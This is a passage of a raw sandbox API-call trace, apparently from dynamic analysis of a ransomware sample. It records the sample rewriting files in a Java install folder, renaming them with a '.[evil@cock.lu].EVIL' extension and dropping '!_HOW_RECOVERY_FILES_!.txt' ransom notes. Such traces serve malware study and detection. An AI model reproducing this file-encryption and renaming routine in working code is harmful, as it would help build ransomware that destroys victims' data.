lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xbd2, lpOverlapped=0x0) returned 1 [0098.404] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.404] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.404] _errno () returned 0x84b1160840 [0098.404] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.404] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0xbe0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xbe0, lpOverlapped=0x0) returned 1 [0098.404] CloseHandle (hObject=0x1a8) returned 1 [0098.404] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\US_export_policy.jar", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0098.404] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0098.404] __uncaught_exception () returned 0x84b1160800 [0098.404] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0098.404] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\US_export_policy.jar" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\us_export_policy.jar"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\US_export_policy.jar.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\security\\us_export_policy.jar.[evil@cock.lu].evil")) returned 1 [0098.405] ??_V@YAXPEAX@Z () returned 0x1 [0098.407] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\US_export_policy.jar", dwFileAttributes=0x0) returned 0 [0098.408] FindNextFileW (in: hFindFile=0x84b11dde60, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 0 [0098.408] FindClose (in: hFindFile=0x84b11dde60 | out: hFindFile=0x84b11dde60) returned 1 [0098.408] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security") returned 0x30 [0098.408] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0098.408] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0098.408] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0098.408] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0098.408] __uncaught_exception () returned 0x84b1160800 [0098.408] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0098.414] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0098.414] wcsstr (_Str="sound.properties", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.414] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\sound.properties") returned 56 [0098.414] wcscmp (_String1="sound.properties", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0098.414] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="sound.properties") returned 0x0 [0098.414] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\sound.properties") returned 0x38 [0098.414] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\sound.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\sound.properties"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0098.416] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x4ba, lpOverlapped=0x0) returned 1 [0098.422] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.422] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.422] _errno () returned 0x84b1160840 [0098.422] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.423] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x4c0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x4c0, lpOverlapped=0x0) returned 1 [0098.423] CloseHandle (hObject=0x1a4) returned 1 [0098.423] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\sound.properties", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0098.423] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0098.423] __uncaught_exception () returned 0x84b1160800 [0098.423] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0098.423] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\sound.properties" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\sound.properties"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\sound.properties.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\sound.properties.[evil@cock.lu].evil")) returned 1 [0098.424] ??_V@YAXPEAX@Z () returned 0x1 [0098.426] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\sound.properties", dwFileAttributes=0x0) returned 0 [0098.427] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0098.427] wcsstr (_Str="tzdb.dat", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.427] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\tzdb.dat") returned 48 [0098.427] wcscmp (_String1="tzdb.dat", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0098.427] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tzdb.dat") returned 0x0 [0098.427] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\tzdb.dat") returned 0x30 [0098.427] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\tzdb.dat" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\tzdb.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0098.428] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x19c04, lpOverlapped=0x0) returned 1 [0098.435] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.435] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.435] _errno () returned 0x84b1160840 [0098.435] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.435] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x19c20, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x19c20, lpOverlapped=0x0) returned 1 [0098.435] CloseHandle (hObject=0x1a4) returned 1 [0098.435] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\tzdb.dat", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0098.436] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0098.436] __uncaught_exception () returned 0x84b1160800 [0098.436] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0098.436] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\tzdb.dat" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\tzdb.dat"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\tzdb.dat.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\tzdb.dat.[evil@cock.lu].evil")) returned 1 [0098.436] ??_V@YAXPEAX@Z () returned 0x1 [0098.439] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\tzdb.dat", dwFileAttributes=0x0) returned 0 [0098.439] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 1 [0098.439] wcsstr (_Str="tzmappings", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.439] _snwprintf (in: _Dest=0x84b0fde170, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\tzmappings") returned 50 [0098.439] wcscmp (_String1="tzmappings", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0098.439] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="tzmappings") returned 0x0 [0098.439] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\tzmappings") returned 0x32 [0098.439] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\tzmappings" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\tzmappings"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0098.441] ReadFile (in: hFile=0x1a4, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fddcc0*=0x20d0, lpOverlapped=0x0) returned 1 [0098.447] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.447] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.447] _errno () returned 0x84b1160840 [0098.447] SetFilePointer (in: hFile=0x1a4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.447] WriteFile (in: hFile=0x1a4, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x20e0, lpNumberOfBytesWritten=0x84b0fddcc0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fddcc0*=0x20e0, lpOverlapped=0x0) returned 1 [0098.448] CloseHandle (hObject=0x1a4) returned 1 [0098.448] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\tzmappings", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0098.448] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0098.448] __uncaught_exception () returned 0x84b1160800 [0098.448] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0098.448] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\tzmappings" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\tzmappings"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\tzmappings.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\lib\\tzmappings.[evil@cock.lu].evil")) returned 1 [0098.449] ??_V@YAXPEAX@Z () returned 0x1 [0098.451] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\tzmappings", dwFileAttributes=0x0) returned 0 [0098.451] FindNextFileW (in: hFindFile=0x84b11dd0e0, lpFindFileData=0x84b0fddf20 | out: lpFindFileData=0x84b0fddf20) returned 0 [0098.451] FindClose (in: hFindFile=0x84b11dd0e0 | out: hFindFile=0x84b11dd0e0) returned 1 [0098.451] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib") returned 0x27 [0098.451] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0098.451] wcslen (_String="\\!_HOW_RECOVERY_FILES_!.txt") returned 0x1b [0098.452] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\lib\\!_HOW_RECOVERY_FILES_!.txt", _Mode="w", _ShFlag=64) returned 0x7ffc020ee2a0 [0098.452] fputc (in: _Ch=32, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 32 [0098.452] __uncaught_exception () returned 0x84b1160800 [0098.452] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0098.453] FindNextFileW (in: hFindFile=0x84b11ddce0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0098.453] wcsstr (_Str="LICENSE", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.453] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\LICENSE") returned 43 [0098.453] wcscmp (_String1="LICENSE", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0098.453] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="LICENSE") returned 0x0 [0098.453] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\LICENSE") returned 0x2b [0098.453] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\LICENSE" (normalized: "c:\\program files\\java\\jre1.8.0_131\\license"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0098.455] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e23040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x28, lpOverlapped=0x0) returned 1 [0098.461] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.461] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.461] _errno () returned 0x84b1160840 [0098.461] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.461] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e23040*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e23040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x40, lpOverlapped=0x0) returned 1 [0098.461] CloseHandle (hObject=0x1a0) returned 1 [0098.462] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\LICENSE", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0098.462] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0098.462] __uncaught_exception () returned 0x84b1160800 [0098.462] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0098.462] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\LICENSE" (normalized: "c:\\program files\\java\\jre1.8.0_131\\license"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\LICENSE.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\license.[evil@cock.lu].evil")) returned 1 [0098.462] ??_V@YAXPEAX@Z () returned 0x1 [0098.465] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\LICENSE", dwFileAttributes=0x0) returned 0 [0098.465] FindNextFileW (in: hFindFile=0x84b11ddce0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0098.465] wcsstr (_Str="README.txt", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.465] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\README.txt") returned 46 [0098.465] wcscmp (_String1="README.txt", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0098.465] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="README.txt") returned 0x0 [0098.465] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\README.txt") returned 0x2e [0098.465] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\README.txt" (normalized: "c:\\program files\\java\\jre1.8.0_131\\readme.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0098.466] GetFileSize (in: hFile=0x1a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0x2e [0098.466] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b1161290, nNumberOfBytesToRead=0x40, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b1161290*, lpNumberOfBytesRead=0x84b0fde1e0*=0x2e, lpOverlapped=0x0) returned 1 [0098.466] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.466] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.466] _errno () returned 0x84b1160840 [0098.466] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.466] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b1161290*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b1161290*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x40, lpOverlapped=0x0) returned 1 [0098.466] CloseHandle (hObject=0x1a0) returned 1 [0098.466] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\README.txt", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0098.467] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0098.467] __uncaught_exception () returned 0x84b1160800 [0098.467] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0098.467] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\README.txt" (normalized: "c:\\program files\\java\\jre1.8.0_131\\readme.txt"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\README.txt.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\readme.txt.[evil@cock.lu].evil")) returned 1 [0098.518] ??_V@YAXPEAX@Z () returned 0x1 [0098.518] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\README.txt", dwFileAttributes=0x0) returned 0 [0098.519] FindNextFileW (in: hFindFile=0x84b11ddce0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0098.519] wcsstr (_Str="release", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.519] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\release") returned 43 [0098.519] wcscmp (_String1="release", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0098.519] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="release") returned 0x0 [0098.519] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\release") returned 0x2b [0098.519] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\release" (normalized: "c:\\program files\\java\\jre1.8.0_131\\release"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0098.520] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2e20040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesRead=0x84b0fde1e0*=0x210, lpOverlapped=0x0) returned 1 [0098.522] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.522] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.522] _errno () returned 0x84b1160840 [0098.522] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.522] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2e20040*, nNumberOfBytesToWrite=0x220, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e20040*, lpNumberOfBytesWritten=0x84b0fde1e0*=0x220, lpOverlapped=0x0) returned 1 [0098.522] CloseHandle (hObject=0x1a0) returned 1 [0098.522] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\release", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0098.523] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0098.523] __uncaught_exception () returned 0x84b1160800 [0098.523] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0098.547] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\release" (normalized: "c:\\program files\\java\\jre1.8.0_131\\release"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\release.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\release.[evil@cock.lu].evil")) returned 1 [0098.547] ??_V@YAXPEAX@Z () returned 0x1 [0098.551] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\release", dwFileAttributes=0x0) returned 0 [0098.551] FindNextFileW (in: hFindFile=0x84b11ddce0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0098.551] wcsstr (_Str="THIRDPARTYLICENSEREADME-JAVAFX.txt", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.551] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 70 [0098.551] wcscmp (_String1="THIRDPARTYLICENSEREADME-JAVAFX.txt", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0098.551] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 0x0 [0098.551] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 0x46 [0098.551] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\THIRDPARTYLICENSEREADME-JAVAFX.txt" (normalized: "c:\\program files\\java\\jre1.8.0_131\\thirdpartylicensereadme-javafx.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a0 [0098.552] GetFileSize (in: hFile=0x1a0, lpFileSizeHigh=0x0 | out: lpFileSizeHigh=0x0) returned 0xf9bd [0098.552] ReadFile (in: hFile=0x1a0, lpBuffer=0x84b2f320a0, nNumberOfBytesToRead=0xf9c0, lpNumberOfBytesRead=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2f320a0*, lpNumberOfBytesRead=0x84b0fde1e0*=0xf9bd, lpOverlapped=0x0) returned 1 [0098.593] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.593] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0098.594] _errno () returned 0x84b1160840 [0098.594] SetFilePointer (in: hFile=0x1a0, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0098.594] WriteFile (in: hFile=0x1a0, lpBuffer=0x84b2f320a0*, nNumberOfBytesToWrite=0xf9c0, lpNumberOfBytesWritten=0x84b0fde1e0, lpOverlapped=0x0 | out: lpBuffer=0x84b2f320a0*, lpNumberOfBytesWritten=0x84b0fde1e0*=0xf9c0, lpOverlapped=0x0) returned 1 [0098.594] CloseHandle (hObject=0x1a0) returned 1 [0098.594] _wfsopen (_FileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\THIRDPARTYLICENSEREADME-JAVAFX.txt", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0098.594] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0098.594] __uncaught_exception () returned 0x84b1160800 [0098.594] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0098.595] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\THIRDPARTYLICENSEREADME-JAVAFX.txt" (normalized: "c:\\program files\\java\\jre1.8.0_131\\thirdpartylicensereadme-javafx.txt"), lpNewFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\THIRDPARTYLICENSEREADME-JAVAFX.txt.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\java\\jre1.8.0_131\\thirdpartylicensereadme-javafx.txt.[evil@cock.lu].evil")) returned 1 [0098.595] ??_V@YAXPEAX@Z () returned 0x1 [0098.595] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\THIRDPARTYLICENSEREADME-JAVAFX.txt", dwFileAttributes=0x0) returned 0 [0098.595] FindNextFileW (in: hFindFile=0x84b11ddce0, lpFindFileData=0x84b0fde440 | out: lpFindFileData=0x84b0fde440) returned 1 [0098.595] wcsstr (_Str="THIRDPARTYLICENSEREADME.txt", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0098.595] _snwprintf (in: _Dest=0x84b0fde690, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Java\\jre1.8.0_131\\THIRDPARTYLICENSEREADME.txt") returned 63 [0098.595] wcscmp (_String1="THIRDPARTYLICENSEREADME.txt", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0098.595] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="THIRDPARTYLICENSEREADME.txt") returned 0x0 [0098.595] wcslen (_String="C:\\\\Program Files\\Java\\jre1.8.0_131\\THIRDPARTYLICENSEREADME.txt") returned 0x3f [0098.595] CreateFileW (lpFileName="C:\\\\Program Files\\Java\\jre1.8.0_131\\THIRDPARTYLICENSEREADME.txt" (normalized: "c:\\program files\\java\\jre1.8.0_131\\thirdpartylicensereadme.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, 